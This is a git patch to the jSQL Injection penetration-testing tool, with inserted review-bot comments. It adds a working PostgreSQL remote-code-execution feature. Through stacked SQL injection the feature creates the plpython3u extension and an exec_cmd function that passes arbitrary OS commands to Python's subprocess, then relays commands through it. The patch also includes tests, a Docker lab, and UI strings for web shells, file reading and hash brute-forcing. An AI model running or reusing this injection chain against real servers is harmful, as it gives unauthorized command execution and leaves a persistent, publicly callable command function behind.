From e1f7962dd9adbd00e5acd5a3f7bcebd9ed71eac1 Mon Sep 17 00:00:00 2001 From: ron190 Date: Sun, 2 Feb 2025 15:53:36 +0100 Subject: [PATCH] Add RCE postgres via plpython3u - Add RCE postgres integration test - Fixes #95984 - Fixes #95985 --- .../model/accessible/CallableHttpHead.java | 1 - .../com/jsql/model/accessible/UdfAccess.java | 66 ++++++++++++++++++- .../com/jsql/model/bean/util/Interaction.java | 3 +- .../java/com/jsql/util/ConnectionUtil.java | 6 +- model/src/main/resources/i18n/jsql.properties | 2 +- .../test/java/com/test/AbstractTestSuite.java | 1 - .../postgres/PostgresExploitRceSuiteIT.java | 47 +++++++++++++ .../sqlite/SqliteExploitWebSuiteIT.java | 2 +- .../src/test/resources/docker/Dockerfile.lamp | 5 +- .../test/resources/docker/lamp/php/get-pg.php | 7 +- .../resources/docker/lamp/start-script.sh | 4 +- .../jsql/view/swing/action/ActionSaveTab.java | 8 +-- .../view/swing/dialog/translate/Language.java | 2 +- ...itRce.java => AddTabExploitRceOracle.java} | 6 +- .../interaction/AddTabExploitRcePostgres.java | 34 ++++++++++ .../view/swing/manager/ManagerExploit.java | 42 ++++++++---- .../panel/preferences/PanelTampering.java | 1 - .../com/jsql/view/swing/tab/TabResults.java | 29 ++++++-- ...{ExploitRce.java => ExploitRceOracle.java} | 14 ++-- .../swing/terminal/ExploitRcePostgres.java | 37 +++++++++++ 20 files changed, 265 insertions(+), 52 deletions(-) create mode 100644 model/src/test/java/com/test/vendor/postgres/PostgresExploitRceSuiteIT.java rename view/src/main/java/com/jsql/view/swing/interaction/{AddTabExploitRce.java => AddTabExploitRceOracle.java} (82%) create mode 100644 view/src/main/java/com/jsql/view/swing/interaction/AddTabExploitRcePostgres.java rename view/src/main/java/com/jsql/view/swing/terminal/{ExploitRce.java => ExploitRceOracle.java} (64%) create mode 100644 view/src/main/java/com/jsql/view/swing/terminal/ExploitRcePostgres.java 
diff --git a/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java b/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java index 6822972cd2..e4aba11ca0 100644 --- a/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java +++ b/model/src/main/java/com/jsql/model/accessible/CallableHttpHead.java @@ -11,7 +11,6 @@ import org.apache.logging.log4j.Logger; import java.net.URI; -import java.net.http.HttpClient; import java.net.http.HttpRequest; import java.net.http.HttpRequest.BodyPublishers; import java.net.http.HttpResponse; diff --git a/model/src/main/java/com/jsql/model/accessible/UdfAccess.java b/model/src/main/java/com/jsql/model/accessible/UdfAccess.java index 8a7505bcdc..dc1d3b6ac9 100644 --- a/model/src/main/java/com/jsql/model/accessible/UdfAccess.java +++ b/model/src/main/java/com/jsql/model/accessible/UdfAccess.java 
@@ -53,7 +53,46 @@ public UdfAccess(InjectionModel injectionModel) { this.injectionModel = injectionModel; } - public void createExploitRce(ExploitMethod exploitMethod) throws JSqlException { + public void createExploitRcePostgres(ExploitMethod exploitMethod) throws JSqlException { + if (!Arrays.asList(ExploitMethod.AUTO, ExploitMethod.QUERY_BODY).contains(exploitMethod)) { + LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead"); + } + + this.injectionModel.injectWithoutIndex(";CREATE EXTENSION plpython3u;", "body#create-ext"); + var languages = this.getResult( + "select array_to_string(array(select lanname FROM pg_language),'')", + "body#find-ext" + ); + if (!languages.contains("plpython3u")) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: python extension not found"); + return; + } + + this.injectionModel.injectWithoutIndex(String.join( + "%0a", + "; CREATE OR REPLACE FUNCTION exec_cmd(cmd TEXT) RETURNS text AS%20$$", + "from subprocess import check_output as c", + "return c(cmd).decode()", + "$$%20LANGUAGE plpython3u;" + ), "body#create-func"); + var functions = this.getResult( + "SELECT routine_name FROM information_schema.routines WHERE routine_type = 'FUNCTION' and routine_name = 'exec_cmd'", + "body#find-func" + ); + if (!functions.contains("exec_cmd")) { + LOGGER.log(LogLevelUtil.CONSOLE_ERROR, "RCE failure: function not found"); + return; + } + + LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: python function found"); + + var request = new Request(); + request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_POSTGRES); + request.setParameters(null, null); + this.injectionModel.sendToViews(request); + } + + public void createExploitRceOracle(ExploitMethod exploitMethod) throws JSqlException { if (!Arrays.asList(ExploitMethod.AUTO, ExploitMethod.QUERY_BODY).contains(exploitMethod)) { LOGGER.log(LogLevelUtil.CONSOLE_INFORM, "Exploit method not implemented, using query body instead"); } 
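Review bot: `createExploitRcePostgres` leaves the `plpython3u` extension and the `exec_cmd` function in the assessed database, and nothing in this hunk removes or records them. PostgreSQL grants EXECUTE on a new function to PUBLIC by default, so after an authorized test every role on that server can still call a command-running function until someone drops it. The method is complete within the hunk; whether another class drops the objects is not visible here. I would add a Javadoc line such as `/** Creates extension plpython3u and function exec_cmd on the target; both persist until dropped and must be listed in the test report. */` and log the two object names at `LogLevelUtil.CONSOLE_INFORM`, so the operator can pass them to the database owner for removal.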
@@ -105,7 +144,7 @@ public void createExploitRce(ExploitMethod exploitMethod) throws JSqlException { LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, "RCE successful: java function found"); var request = new Request(); - request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE); + request.setMessage(Interaction.ADD_TAB_EXPLOIT_RCE_ORACLE); request.setParameters(null, null); this.injectionModel.sendToViews(request); } @@ -322,7 +361,7 @@ private boolean buildSysEval(String nameLibrary) throws JSqlException { return true; } - public String runCommandRce(String command, UUID uuidShell) { + public String runCommandRceOracle(String command, UUID uuidShell) { String result; try { result = this.getResult( @@ -344,6 +383,27 @@ public String runCommandRce(String command, UUID uuidShell) { return result; } + public String runCommandRcePostgres(String command, UUID uuidShell) { + String result; + try { + result = this.getResult( + String.format( + "SELECT exec_cmd('%s')||'%s'", + command.replace(StringUtils.SPACE, "%20"), // prevent SQL cleaning on system cmd: 'ls-l' instead of 'ls -l' + VendorYaml.TRAIL_SQL + ), + "rce#run-cmd" + ); + } catch (JSqlException e) { + result = "Command failure: " + e.getMessage() +"\nTry '"+ command.trim() +" 2>&1' to get a system error message.\n"; + } + var request = new Request(); + request.setMessage(Interaction.GET_EXPLOIT_RCE_RESULT); + request.setParameters(uuidShell, result); + this.injectionModel.sendToViews(request); + return result; + } + public String runCommand(String command, UUID uuidShell) { String result; try { diff --git a/model/src/main/java/com/jsql/model/bean/util/Interaction.java b/model/src/main/java/com/jsql/model/bean/util/Interaction.java index 030c887034..1808bc09e4 100644 --- a/model/src/main/java/com/jsql/model/bean/util/Interaction.java +++ b/model/src/main/java/com/jsql/model/bean/util/Interaction.java 
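Review bot: `runCommandRcePostgres`, added in the `@@ -344,6 +383,27 @@` hunk, has no Javadoc and appears to repeat the structure of `runCommandRceOracle`, whose body is only partly visible in the preceding hunk. The catch branch puts the "Command failure: …" text into `result`, then sends and returns it like real output, so a caller or integration test cannot tell a failed call from command output without parsing the string. I would document that with `/** Runs the command through exec_cmd and sends the text to the views as GET_EXPLOIT_RCE_RESULT; on JSqlException the returned text is an error message, not command output. */`. The shared `Request` construction and `sendToViews` call could move into one private helper used by both methods.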
@@ -11,7 +11,8 @@ public enum Interaction { ADD_TAB_EXPLOIT_WEB("AddTabExploitWeb"), ADD_TAB_EXPLOIT_SQL("AddTabExploitSql"), ADD_TAB_EXPLOIT_UDF("AddTabExploitUdf"), - ADD_TAB_EXPLOIT_RCE("AddTabExploitRce"), + ADD_TAB_EXPLOIT_RCE_ORACLE("AddTabExploitRceOracle"), + ADD_TAB_EXPLOIT_RCE_POSTGRES("AddTabExploitRcePostgres"), CREATE_VALUES_TAB("CreateValuesTab"), CREATE_ANALYSIS_REPORT("CreateAnalysisReport"), diff --git a/model/src/main/java/com/jsql/util/ConnectionUtil.java b/model/src/main/java/com/jsql/util/ConnectionUtil.java index 016d426961..f350769920 100644 --- a/model/src/main/java/com/jsql/util/ConnectionUtil.java +++ b/model/src/main/java/com/jsql/util/ConnectionUtil.java @@ -6,14 +6,16 @@ import com.jsql.model.bean.util.Request; import com.jsql.model.exception.InjectionFailureException; import com.jsql.model.exception.JSqlException; -import com.jsql.model.exception.JSqlRuntimeException; import com.jsql.model.injection.method.AbstractMethodInjection; import org.apache.commons.lang3.StringUtils; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; import java.io.IOException; -import java.net.*; +import java.net.Authenticator; +import java.net.CookieManager; +import java.net.PasswordAuthentication; +import java.net.URI; import java.net.http.HttpClient; import java.net.http.HttpClient.Version; import java.net.http.HttpHeaders; diff --git a/model/src/main/resources/i18n/jsql.properties b/model/src/main/resources/i18n/jsql.properties index 99f271d45e..a39b202d7b 100644 --- a/model/src/main/resources/i18n/jsql.properties +++ b/model/src/main/resources/i18n/jsql.properties 
@@ -1 +1 @@ -CONTEXT_MENU_SELECT_ALL = Select All CONTEXT_MENU_COPY = Copy CONTEXT_MENU_CLEAR = Clear CONTEXT_MENU_COPY_PAGE_URL = Copy page URL NEW_WINDOW_MENU = New Window NEW_WINDOW_START = Starting new window COLUMNS_CHECK_ALL = Check All COLUMNS_UNCHECK_ALL = Uncheck All THREAD_LOAD = Load THREAD_STOP = Stop THREAD_PAUSE = Pause THREAD_RESUME = Resume RELOAD_TABLES = Reload tables RELOAD_COLUMNS = Reload columns RENAME_NODE = Rename node ADDRESS_BAR_PLACEHOLDER = Enter address (e.g. http://127.0.0.1/index.php?key=value&injectMe=-1) # DATABASE DATABASE_TAB = Database DATABASE_TOOLTIP = Explore databases on server DATABASE_EMPTY = No database # ADMINPAGE ADMINPAGE_TAB = Admin page ADMINPAGE_TOOLTIP = Find admin pages on server ADMIN_PAGE_RUN_BUTTON_STOP = Stop ADMIN_PAGE_RUN_BUTTON_LABEL = Find ADMIN_PAGE_RUN_BUTTON_TOOLTIP = \ Find and browse common pages on server, getting admin access
\ e.g. Using address http://host/path/page.php then it checks for
\ host/path/<admin> and host/<admin> # FILE PRIVILEGE_LABEL = FILE privilege PRIVILEGE_TOOLTIP = \ Requires FILE privilege
\ Works only if FILE is granted to current database user FILE_TAB = Read file FILE_TOOLTIP = Read files on server using injection FILE_RUN_BUTTON_LABEL = Read FILE_RUN_BUTTON_TOOLTIP = \ Select common files to read by injection
\ Path must match a file existing on server FILE_RUN_BUTTON_STOP = Stop # EXPLOIT EXPLOIT_TAB = Exploit EXPLOIT_TOOLTIP = Create payload on server EXPLOIT_NETSHARE_LABEL = Path to your netshare folder (e.g \\\\127.0.0.1\\C$\\folder\\) EXPLOIT_NETSHARE_TOOLTIP = Folder path to your network share (direct connect)
\ Shell is put into your network share first, then server copies the shell from
\ your share to the destination (e.g. load_file(\\\\my_ip\\my_file) into '/server/path') SHELL_URL_LABEL = [Optional] URL for the shell folder SHELL_URL_TOOLTIP = \ Call the shell to another URL than current injection URL
\ Default calls the shell at same URL location as address bar.
\ Override to force another URL path (e.g. url rewriting, alias, redirection SHELL_RUN_BUTTON_LABEL = Create SHELL_RUN_BUTTON_TOOLTIP = Create payload on server
\ Gives access to system commands, SQL and upload UPLOAD_DIALOG_TEXT = Select a file to Upload SQL_SHELL_USERNAME_LABEL = [Optional] Database login SQL_SHELL_PASSWORD_LABEL = [Optional] Database password SQL_SHELL_USERNAME_TOOLTIP = \ Connect to shell with login
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. SQL_SHELL_PASSWORD_TOOLTIP = \ Connect to shell with password
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. EXPLOIT_UDF = [mysql] UDF cmd shell EXPLOIT_UDF_TOOLTIP = UDF shell to run system command on server via library
\ Requires stack query EXPLOIT_RCE = [oracle] RCE cmd shell EXPLOIT_RCE_TOOLTIP = RCE shell to run system command on server via java
\ Requires stack query, query body only EXPLOIT_WEB_MYSQL = [php mysql] Web cmd shell EXPLOIT_WEB_MYSQL_TOOLTIP = Web shell to run system command on server EXPLOIT_WEB_SQLITE = [php sqlite] Web cmd shell EXPLOIT_WEB_SQLITE_TOOLTIP = Web shell to run system command on server
\ Requires stack query, write access on destination folder, query body only EXPLOIT_SQL_MYSQL = [php mysql] SQL query shell EXPLOIT_SQL_MYSQL_TOOLTIP = SQL shell to run SQL command on server EXPLOIT_UPLOAD_MYSQL = [php mysql] Upload payload EXPLOIT_UPLOAD_MYSQL_TOOLTIP = Payload to upload a file on server EXPLOIT_UPLOAD_SQLITE = [php sqlite] Upload payload EXPLOIT_UPLOAD_SQLITE_TOOLTIP = Payload to upload a file on server MODE_AUTO = auto MODE_AUTO_TOOLTIP = Use query body then temp table if failing MODE_QUERY_BODY = query body MODE_QUERY_BODY_TOOLTIP = Create shell using single SQL query that contains body in hex
\ Limited to small payload when using GET MODE_TEMP_TABLE = temp table MODE_TEMP_TABLE_TOOLTIP = Create shell using table that contains body in hex
\ Requires stack queries to create table MODE_NETSHARE = netshare MODE_NETSHARE_TOOLTIP = Create shell using file loaded from your network share
\ Requires folder path like \\\\127.0.0.1\\C$\\folder\\ (e.g. local, CTF, public) # BRUTEFORCE BRUTEFORCE_TAB = Brute force BRUTEFORCE_TOOLTIP = Brute force hashes BRUTEFORCE_HASH_LABEL = Hash to brute force BRUTEFORCE_HASH_TOOLTIP = \ Hash to brute force
\ Password for admin pages and for database users are
\ usually hashed inside the database. BRUTEFORCE_HASH_TYPE_TOOLTIP = Type of hash
\ MD5 is commonly used to hash password of admin pages.
\ Password in MySQL is hashed differently (see table 'mysql.user'). BRUTEFORCE_LCASE_TOOLTIP = \ Lower case characters
\ Check if searched string contains any of following characters:
\ abcdefghijklmnopqrstuvwxyz BRUTEFORCE_UCASE_TOOLTIP = \ Upper case characters
\ Check if searched string contains any of following characters:
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ BRUTEFORCE_NUM_TOOLTIP = \ Numeric characters
\ Check if searched string contains any of following characters:
\ 0123456789 BRUTEFORCE_SPEC_TOOLTIP = \ Special characters
\ Check if searched string contains any of following characters:
\  ~`!@#$%^&*()_-+={}[]|\\;:'\"<.,>/? BRUTEFORCE_EXCLUDE_LABEL = Character(s) to exclude BRUTEFORCE_EXCLUDE_TOOLTIP = \ Exclude characters
\ Speed up process by excluding characters from the search. BRUTEFORCE_MIN_LABEL = Size min. BRUTEFORCE_MAX_LABEL = max. BRUTEFORCE_MIN_TOOLTIP = \ Minimum length of searched string
\ Speed up process by specifying the minimum length to search. BRUTEFORCE_MAX_TOOLTIP = \ Maximum length of searched string
\ Speed up process by specifying the maximum length to search. BRUTEFORCE_RUN_BUTTON_LABEL = Start BRUTEFORCE_RUN_BUTTON_TOOLTIP = \ Brute force provided hash to find original text
\ Hash the selected chars range and compare with provided BRUTEFORCE_RESULT = Result of brute force processing BRUTEFORCE_CHARACTER_RANGE = Select character range like lower case and numeric characters BRUTEFORCE_INCORRECT_MIN_MAX_LENGTH = Minimum length must be equal or lower than Maximum length BRUTEFORCE_STOP = Stop BRUTEFORCE_EMPTY_HASH = Missing hash BRUTEFORCE_CURRENT_STRING = Current string BRUTEFORCE_CURRENT_HASH = Current hash BRUTEFORCE_POSSIBILITIES = Number of possibilities BRUTEFORCE_CHECKED_HASHES = Checked hashes BRUTEFORCE_ESTIMATED = Estimated hashes left BRUTEFORCE_PERSECOND = Per second BRUTEFORCE_TRAVERSING_REMAINING = Traversing remaining BRUTEFORCE_DAYS = days BRUTEFORCE_HOURS = h BRUTEFORCE_MINUTES = min BRUTEFORCE_SECONDS = s BRUTEFORCE_PERCENT_DONE = Percent done BRUTEFORCE_ABORTED = Brute force aborted BRUTEFORCE_FOUND_HASH = Hash found BRUTEFORCE_HASH_NOT_FOUND = Hash not found # CODER CODER_TAB = Encoding CODER_TOOLTIP = Encode or decode a string CODER_INPUT = Type a text to convert CODER_RESULT = Result of conversion # SCAN SCANLIST_TAB = Batch scan SCANLIST_TOOLTIP = Test injection on multiple targets SCAN_RUN_BUTTON_STOP = Stop SCAN_RUN_BUTTON_LABEL = Start SCAN_RUN_BUTTON_TOOLTIP = Scan common public URL for injection # ADDRESSBAR FIELD_QUERYSTRING_TOOLTIP = \ Server URL
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside path or params (e.g. path?inject=*&q=).\
\ NTLM and Negotiate Authentication (NTLM is also set in Preferences)
\ Set NTLM and Negotiate authentication in URL.
\ E.g. http://domain\\user:pass@127.0.0.1/path?q=\ FIELD_REQUEST_TOOLTIP = \ Request parameters
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. inject=*&q=).\ FIELD_HEADER_TOOLTIP = \ Header parameters like Cookie, User-Agent and Referer
\ Default injects only last param, for other params use Preferences.
\ Use character * to inject inside params (e.g. Inject:*\\r\\nQ:).
\ Set cookies with Cookie: key1=value1;key2=.
\ Define Basic authent with user:pass encoded in base64.
\ E.g. user:pass => dXNlcjpwYXNz, set Authorization: Basic dXNlcjpwYXNz\ METHOD_QUERYSTRING_TOOLTIP = Inject using URL parameters METHOD_REQUEST_TOOLTIP = Inject using Request parameters METHOD_HEADER_TOOLTIP = Inject using Header parameters METHOD_CUSTOM_TOOLTIP = Set user defined HTTP method.
\ A valid method is limited to chars:
\ !#$%&'*+-.^_`|~0123456789
\ abcdefghijklmnopqrstuvwxyz
\ ABCDEFGHIJKLMNOPQRSTUVWXYZ\ BUTTON_START_TOOLTIP = Start injection BUTTON_STOP_TOOLTIP = Stop injection BUTTON_STOPPING_TOOLTIP = Stopping... BUTTON_ADVANCED = Advanced DIALOG_NEW_INJECTION_TITLE = New injection DIALOG_NEW_INJECTION_TEXT = Start a new injection? STRATEGY_TIME_TOOLTIP = \ Slowest and least reliable method
\ Create 5s delay when query statement is false.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_BLIND_TOOLTIP = \ Slow and reliable method
\ Create response A when query statement is true, response B otherwise.
\ Read each character's ASCII code bit (8 URL calls). STRATEGY_MULTIBIT_TOOLTIP = \ Slow and reliable method 3 times faster than Blind
\ Require 8 pages mapped to distinct id.
\ Read multiple bits for each character's ASCII code (3 URL calls). STRATEGY_ERROR_TOOLTIP = \ Fast and accurate method
\ Read data directly from source page. STRATEGY_STACK_TOOLTIP = \ Fastest and accurate method though less common
\ Read large data directly from source page. STRATEGY_UNION_TOOLTIP = \ Fastest and accurate method
\ Read large data directly from source page. # MENUBAR MENUBAR_COMMUNITY = Community MENUBAR_COMMUNITY_REPORTISSUE = Report issue or bug MENUBAR_COMMUNITY_HELPTRANSLATE = I help translate jSQL into MENUBAR_COMMUNITY_ANOTHERLANGUAGE = another language... MENUBAR_HELP = Help MENUBAR_HELP_UPDATE = Check for Updates MENUBAR_HELP_ABOUT = About jSQL Injection MENUBAR_APPEARANCE = Appearance MENUBAR_THEMES = Themes MENUBAR_WINDOWS = Windows MENUBAR_LANGUAGE = Language MENUBAR_SQL_ENGINE = SQL Engine MENUBAR_VIEW = Show View MENUBAR_PANEL = Show Consoles MENUBAR_PREFERENCES = Preferences MENUBAR_EDIT = Edit MENUBAR_FILE = File MENUBAR_FILE_EXIT = Exit MENUBAR_FILE_SAVETABAS = Save Tab As... SAVE_TAB_CONFIRM_TITLE = Confirm Save As SAVE_TAB_CONFIRM_LABEL = already exists.\nDo you want to replace it ? TRANSLATION_TEXT = Contribute and translate parts of jSQL Injection into %s
\ Help the community and translate some buttons, menus, tabs and tooltips into %s,\ then click on Send to forward your changes to the developer on GitHub.
",\ E.g. for French, change CONTEXT_MENU_COPY = Copy to CONTEXT_MENU_COPY = Copier,\ then click on Send. The list only displays what needs to be translated \ and is updated as soon as the developer processes your request.\ TRANSLATION_SEND = Send TRANSLATION_TITLE = Translate to TRANSLATION_PLACEHOLDER = Text remaining to translate TRANSLATION_PROGRESS = translated into # CONSOLE CONSOLE_MAIN_LABEL = Console CONSOLE_MAIN_TOOLTIP = General information CONSOLE_CHUNK_LABEL = Chunk CONSOLE_CHUNK_TOOLTIP = Raw data extracted CONSOLE_BINARY_LABEL = Binary CONSOLE_BINARY_TOOLTIP = Blind/Time chars extracted CONSOLE_NETWORK_LABEL = Network CONSOLE_NETWORK_TOOLTIP = URL calls logs CONSOLE_JAVA_LABEL = Java CONSOLE_JAVA_TOOLTIP = Java thrown exception NETWORK_TAB_URL_LABEL = URL NETWORK_TAB_HEADERS_LABEL = Headers NETWORK_TAB_PARAMS_LABEL = Request NETWORK_TAB_RESPONSE_LABEL = Response NETWORK_TAB_SOURCE_LABEL = Source NETWORK_TAB_PREVIEW_LABEL = Preview NETWORK_LINE_PLACEHOLDER_URL = Request URL NETWORK_LINE_PLACEHOLDER_HEADERS = Request headers NETWORK_LINE_PLACEHOLDER_REQUEST = Request body NETWORK_LINE_PLACEHOLDER_RESPONSE = Response headers NETWORK_LINE_PLACEHOLDER_SOURCE = Page source NETWORK_LINE_PLACEHOLDER_PREVIEW = Page rendering NETWORK_TAB_URL_COLUMN = URL NETWORK_TAB_SIZE_COLUMN = Size # LOGGER LOG_START_INJECTION = Starting new injection LOG_CONNECTION_TEST = Connection test... LOG_USING_INSERTION_CHARACTER = Using character insertion LOG_USING_DATABASE_TYPE = Using LOG_DATABASE_TYPE_FORCED_BY_USER = Database forced to LOG_DATABASE_TYPE_NOT_FOUND = Database unknown, forcing to LOG_VULNERABLE = Vulnerable to LOG_CHECKING_STRATEGY = Checking strategy LOG_CHECKING = Checking LOG_USING_STRATEGY = Using strategy LOG_FETCHING_INFORMATIONS = Fetching metadata... LOG_FETCHING_DATABASES = Fetching databases... 
LOG_DONE = Done LOG_DB_METADATA_INCORRECT = Incorrect or incomplete data LOG_DB_METADATA_WARN = Processing but failure is expected LOG_LIST_VALUES_INCOMPLETE = Incomplete row found LOG_LIST_VALUES_TOO_LONG = Row too long at # LOG_ADMIN_UNKNOWN_PROTOCOL = Unknown URL protocol LOG_ADMIN_NO_PROTOCOL = Undefined URL protocol, forcing to [http://] LOG_I18N_TEXT_NOT_FOUND = Language file not found, text to translate loaded from local LOG_IP_ADDRESS_CHECK = Checking ip address... LOG_IP_ADDRESS_IS = Your public IP address is # LIST LIST_NEW_VALUE = New Value(s)... LIST_CUT = Cut LIST_PASTE = Paste LIST_DELETE = Delete LIST_RESTORE_DEFAULT = Restore default LIST_ADD_VALUE_OK = Ok LIST_ADD_VALUE_CANCEL = Cancel LIST_ADD_VALUE_TITLE = Add Value(s) LIST_ADD_VALUE_LABEL = Add new value(s) to the list, a value per line.
Or you can copy/paste directly from your clipboard to the list. LIST_EXPORT_TITLE = Export... LIST_EXPORT_CONFIRM_LABEL = already exists.\nDo you want to replace it? LIST_EXPORT_CONFIRM_TITLE = Confirm Export LIST_IMPORT_CONFIRM_REPLACE = Replace LIST_IMPORT_CONFIRM_ADD = Add LIST_IMPORT_CONFIRM_LABEL = Replace list or add to current location? LIST_IMPORT_CONFIRM_TITLE = Import... LIST_IMPORT_ERROR_TITLE = Import Error LIST_IMPORT_ERROR_LABEL = Unsupported file format, use text file only # SQLENGINE SQLENGINE_STANDARD = Default SQLENGINE_ZIP = Zip SQLENGINE_DIOS = Dios SQLENGINE_STRUCTURE = Structure SQLENGINE_DATABASES = Database SQLENGINE_TABLES = Tables SQLENGINE_COLUMNS = Columns SQLENGINE_ROWS = Rows SQLENGINE_FIELD = Field SQLENGINE_FIELDS_SEPARATOR = Fields Separator SQLENGINE_METADATA = Metadata SQLENGINE_STRATEGY = Strategy SQLENGINE_STACK = Stack SQLENGINE_UNION = Union SQLENGINE_ERROR = Error SQLENGINE_BOOLEAN = Binary SQLENGINE_FINGERPRINTING = Fingerprint SQLENGINE_CONFIGURATION = Configuration SQLENGINE_ORDER_BY = Order by SQLENGINE_CHARACTERS_SLIDINGWINDOW = Char Sliding Window SQLENGINE_ROWS_SLIDINGWINDOW = Rows Sliding Window SQLENGINE_CAPACITY = Capacity SQLENGINE_CALIBRATOR = Calibrator SQLENGINE_FAILSAFE = Failsafe SQLENGINE_END_COMMENT = End comment SQLENGINE_LIMIT_START_INDEX = Limit start index SQLENGINE_FILE = File # OTHER UPDATE_EXCEPTION = \ An error occurred while checking updates, download the latest version from official website:\n\ https://github.com/ron190/jsql-injection/releases UPDATE_NEW_VERSION = A new version of jSQL Injection is available at https://github.com/ron190/jsql-injection/releases UPDATE_UPTODATE = jSQL Injection is up-to-date UPDATE_LOADING = Checking updates... 
ABOUT_WINDOW_TITLE = About ABOUT_WEBPAGE = Webpage ABOUT_CLOSE = Close PREFERENCES_PROXY = Proxy PREFERENCES_USEPROXY = Use a proxy PREFERENCES_PROXYADDRESS = Proxy address PREFERENCES_PROXYPORT = Proxy port PREFERENCES_AUTHENT = Authentication PREFERENCES_AUTHENT_USER = Username PREFERENCES_AUTHENT_PASS = Password PREFERENCES_CHECKUPDATE = Check update at startup PREFERENCES_REPORT_EXCEPTIONS = Report unhandled exceptions PREFERENCES_FOLLOW_REDIRECTIONS = Follow HTTP redirections PREFERENCES_CHECKIP = Check your IP PREFERENCES_APPLY = Apply \ No newline at end of file +CONTEXT_MENU_SELECT_ALL = Select All CONTEXT_MENU_COPY = Copy CONTEXT_MENU_CLEAR = Clear CONTEXT_MENU_COPY_PAGE_URL = Copy page URL NEW_WINDOW_MENU = New Window NEW_WINDOW_START = Starting new window COLUMNS_CHECK_ALL = Check All COLUMNS_UNCHECK_ALL = Uncheck All THREAD_LOAD = Load THREAD_STOP = Stop THREAD_PAUSE = Pause THREAD_RESUME = Resume RELOAD_TABLES = Reload tables RELOAD_COLUMNS = Reload columns RENAME_NODE = Rename node ADDRESS_BAR_PLACEHOLDER = Enter address (e.g. http://127.0.0.1/index.php?key=value&injectMe=-1) # DATABASE DATABASE_TAB = Database DATABASE_TOOLTIP = Explore databases on server DATABASE_EMPTY = No database # ADMINPAGE ADMINPAGE_TAB = Admin page ADMINPAGE_TOOLTIP = Find admin pages on server ADMIN_PAGE_RUN_BUTTON_STOP = Stop ADMIN_PAGE_RUN_BUTTON_LABEL = Find ADMIN_PAGE_RUN_BUTTON_TOOLTIP = \ Find and browse common pages on server, getting admin access
\ e.g. Using address http://host/path/page.php then it checks for
\ host/path/<admin> and host/<admin> # FILE PRIVILEGE_LABEL = FILE privilege PRIVILEGE_TOOLTIP = \ Requires FILE privilege
\ Works only if FILE is granted to current database user FILE_TAB = Read file FILE_TOOLTIP = Read files on server using injection FILE_RUN_BUTTON_LABEL = Read FILE_RUN_BUTTON_TOOLTIP = \ Select common files to read by injection
\ Path must match a file existing on server FILE_RUN_BUTTON_STOP = Stop # EXPLOIT EXPLOIT_TAB = Exploit EXPLOIT_TOOLTIP = Create payload on server EXPLOIT_NETSHARE_LABEL = Path to your netshare folder (e.g \\\\127.0.0.1\\C$\\folder\\) EXPLOIT_NETSHARE_TOOLTIP = Folder path to your network share (direct connect)
\ Shell is put into your network share first, then server copies the shell from
\ your share to the destination (e.g. load_file(\\\\my_ip\\my_file) into '/server/path') SHELL_URL_LABEL = [Optional] URL for the shell folder SHELL_URL_TOOLTIP = \ Call the shell to another URL than current injection URL
\ Default calls the shell at same URL location as address bar.
\ Override to force another URL path (e.g. url rewriting, alias, redirection SHELL_RUN_BUTTON_LABEL = Create SHELL_RUN_BUTTON_TOOLTIP = Create payload on server
\ Gives access to system commands, SQL and upload UPLOAD_DIALOG_TEXT = Select a file to Upload SQL_SHELL_USERNAME_LABEL = [Optional] Database login SQL_SHELL_PASSWORD_LABEL = [Optional] Database password SQL_SHELL_USERNAME_TOOLTIP = \ Connect to shell with login
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. SQL_SHELL_PASSWORD_TOOLTIP = \ Connect to shell with password
\ Leave empty if anonymous access is authorized.
\ Read an existing file from server to get missing credentials. EXPLOIT_UDF_MYSQL = [mysql] UDF cmd shell EXPLOIT_UDF_MYSQL_TOOLTIP = UDF shell to run system command on server via library
\ Requires stack query EXPLOIT_RCE_ORACLE = [oracle] RCE cmd shell EXPLOIT_RCE_ORACLE_TOOLTIP = RCE shell to run system command on server via java
\ Requires stack query, query body only EXPLOIT_RCE_POSTGRES = [postgres] RCE cmd shell EXPLOIT_RCE_POSTGRES_TOOLTIP = RCE shell to run system command on server via python extension
\ Requires stack query, package postgresql-plpython3, query body only EXPLOIT_WEB_MYSQL = [php mysql] Web cmd shell EXPLOIT_WEB_MYSQL_TOOLTIP = Web shell to run system command on server EXPLOIT_WEB_SQLITE = [php sqlite] Web cmd shell EXPLOIT_WEB_SQLITE_TOOLTIP = Web shell to run system command on server
\ Requires stack query, write access on destination folder, query body only EXPLOIT_SQL_MYSQL = [php mysql] SQL query shell EXPLOIT_SQL_MYSQL_TOOLTIP = SQL shell to run SQL command on server EXPLOIT_UPLOAD_MYSQL = [php mysql] Upload payload EXPLOIT_UPLOAD_MYSQL_TOOLTIP = Payload to upload a file on server EXPLOIT_UPLOAD_SQLITE = [php sqlite] Upload payload EXPLOIT_UPLOAD_SQLITE_TOOLTIP = Payload to upload a file on server MODE_AUTO = auto MODE_AUTO_TOOLTIP = Use query body then temp table if failing MODE_QUERY_BODY = query body MODE_QUERY_BODY_TOOLTIP = Create shell using single SQL query that contains body in hex
\ Limited to small payload when using GET MODE_TEMP_TABLE = temp table MODE_TEMP_TABLE_TOOLTIP = Create shell using table that contains body in hex
\ Requires stack queries to create table MODE_NETSHARE = netshare MODE_NETSHARE_TOOLTIP = Create shell using file loaded from your network share
\ Requires folder path like \\\\127.0.0.1\\C$\\folder\\ (e.g. local, CTF, public) # BRUTEFORCE BRUTEFORCE_TAB = Brute force BRUTEFORCE_TOOLTIP = Brute force hashes BRUTEFORCE_HASH_LABEL = Hash to brute force BRUTEFORCE_HASH_TOOLTIP = \ Hash to brute force
